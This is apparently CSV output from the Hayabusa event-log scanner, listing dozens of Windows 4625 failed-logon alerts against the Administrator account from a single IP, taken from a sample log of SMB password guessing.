2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL4ahBqUyGeTONkE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8hJ888Kmyi6KqIPn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VZ6sfYMHuygnMdY2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XkuSlyTNc5OOoUtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Z13YmupcMato8Sd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JedeMnLPnRJEwhZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmy0c0wFheIRzSo4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sskKdqku5S0f1sWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 15Qg0nCXNj7Ub1Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZD6iuaqv70k69G87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gk3UuqTJmvH1snmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaw9iF5mJlyygdnB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Sr5PZAd1qMc7hi3c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l5xbQtyueVq3fJSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g2nP0zz2ofBxTGw6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SYJheREJmEwj0791  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: exglD9fnLwaqwRZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bSAU1QjasDAsmry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cfnrtXR7evQBbaOw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYAwjW99chcntPsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rG2PYfOTfT7QvbPu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FojDtfDNXq0gQfYu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SUTT0QycbFtyJfNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gcbv1lrcYdT9Wuli  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjdFfvCCfGXo7FUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzqGdWlGglLQx6Z4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3Rt80PMk70sVqbk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: okunzcEHnxUml4SG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qH0AY3DeIryuHSiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DjqtxY5Fly4qAusS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PXHYu7wAqo7m6mZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaEM3boErBRrCbna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nSzwstH2imPjwah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6NM0I4vRTXlLKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jYhjN3f8KlFIEUKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qWicYt2HXLDgc3kc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uz7yqqxdMrsM2L1g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqKTguT2Z3OPCxGR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ywpwCM4u6nFSq9oS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1t5ZBw3HOxux65e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtLFQSltjjOjdl2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AyFD3cjef0NUMZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDYECnF1YTKRKA3K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfqxcIVpX9BbsPIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjL5hvyYesMfDISw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3bh8c5ohv55SAX26  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MflfcFDnGU3xUOmz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aX0wfTs5FzCdwGrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gdU6faDjEH5wW2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 507PC8xD6l0TbhG3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrWgYcf9EuXt4MHS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvIGEw3fdX9cDzIV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9X1q0dT5irWa44Rz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpgAkElSQjVo53z2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nxUEwRMaiAhiIXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIoaysmFNfEerv8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aHLhFgL0xfnrAIoF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YGK96B1hDPMK9YKh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhDnNRDnAwctVtgQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zzO7RKaBPpg549A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDgDGO3IKiLoIQ5D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aaYeBTUEudC3446  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I41H8U06uuGlMf9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6Eh55149gbuU2el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajzJabQi7CjosFQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l9y7gyU9aJi6Fpm3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hbLiIVcBYlu5JkX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDfEfHk54J3lJI6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WOpuMTECalyeObl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nZQYU1dyQOqlNJDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pc58gDT07WNH3mMz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhExnDfInKbEI6AO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKKTTQ0ZT2Ye4TV9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
